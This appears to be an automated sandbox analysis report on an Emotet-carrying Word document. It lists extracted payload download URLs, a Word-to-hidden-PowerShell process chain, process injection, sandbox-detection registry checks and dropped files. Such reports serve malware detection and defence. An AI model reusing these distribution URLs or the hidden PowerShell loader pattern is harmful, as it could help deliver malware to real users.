Analysis
max time kernel: 28s
resource: win10v191014
submitted: 14-01-2020 23:35
General
Malware Config
Extracted
http://xmdivas.com/a9981b580e0fef550bcb0fd8fadcc02b/eiqgv/
http://digitaltimbangan.com/cgi-bin/cj8/
https://sports.tj/wp-includes/p5n5i1d/
https://work4sales.com/wp-content/rw5N8k08Ed/
https://rmntnk.ru/omlakdj17fkcjfsd/rxm1/
Extracted
emotet
Signatures
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
  description              pid   process
  Token: SeDebugPrivilege  3712  powershell.exe

Suspicious behavior: EmotetMutantsSpam 2 IoCs
Processes:
  pid   process
  3964  380.exe
  3772  methodsdispid.exe

Drops file in System32 directory 1 IoCs
Processes:
  description   ioc                                                              process
  File renamed  C:\Users\Admin\380.exe => C:\Windows\SysWOW64\methodsdispid.exe  380.exe

Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
  pid   process
  4988  WINWORD.EXE
  4732  380.exe
  3964  380.exe
  4332  methodsdispid.exe
  3772  methodsdispid.exe

Process spawned unexpected child process 1 IoCs
Processes:
  description                                                                         pid   pid_target  process         target process
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  3712  1976        powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs
Processes:
  description                       pid   process            target process
  PID 3712 wrote to memory of 4732  3712  powershell.exe     380.exe
  PID 4732 wrote to memory of 3964  4732  380.exe            380.exe
  PID 4332 wrote to memory of 3772  4332  methodsdispid.exe  methodsdispid.exe

Executes dropped EXE 4 IoCs
Processes:
  pid   process
  4732  380.exe
  3964  380.exe
  4332  methodsdispid.exe
  3772  methodsdispid.exe

Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
  description        ioc                                                                   process
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0      WINWORD.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz  WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
  description        ioc                                                        process
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily  WINWORD.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU     WINWORD.EXE
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS               WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
  pid   process
  4988  WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
  pid   process
  3712  powershell.exe
Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ba266e91b64c51e7256d079867b421c0784b6bd0c16fb6032f542d73bf607d1e.doc" /o ""
  - Suspicious use of SetWindowsHookEx
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -w hidden -en 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
  - Suspicious use of AdjustPrivilegeToken
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  - Suspicious behavior: EnumeratesProcesses

  C:\Users\Admin\380.exe
    "C:\Users\Admin\380.exe"
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    - Executes dropped EXE

    C:\Users\Admin\380.exe
      --4c4a2509
      - Suspicious behavior: EmotetMutantsSpam
      - Drops file in System32 directory
      - Suspicious use of SetWindowsHookEx
      - Executes dropped EXE

C:\Windows\SysWOW64\methodsdispid.exe
  "C:\Windows\SysWOW64\methodsdispid.exe"
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - Executes dropped EXE

  C:\Windows\SysWOW64\methodsdispid.exe
    --f4d1fd05
    - Suspicious behavior: EmotetMutantsSpam
    - Suspicious use of SetWindowsHookEx
    - Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

- C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\403f0cc78adafaecdb503a6c6424923d_293fa5bd-edfb-4bba-800e-a7dce3ea3438
- C:\Users\Admin\380.exe
- C:\Users\Admin\380.exe
- C:\Users\Admin\380.exe
- C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438
- C:\Windows\SysWOW64\methodsdispid.exe
- C:\Windows\SysWOW64\methodsdispid.exe
- memory/3772-16-0x0000000000CF0000-0x0000000000D07000-memory.dmp  Filesize: 92KB
- memory/3772-17-0x0000000000400000-0x000000000046E000-memory.dmp  Filesize: 440KB
- memory/3964-11-0x0000000000400000-0x000000000046E000-memory.dmp  Filesize: 440KB
- memory/3964-10-0x0000000002030000-0x0000000002047000-memory.dmp  Filesize: 92KB
- memory/4332-13-0x0000000000590000-0x00000000005A7000-memory.dmp  Filesize: 92KB
- memory/4732-7-0x0000000000640000-0x0000000000657000-memory.dmp  Filesize: 92KB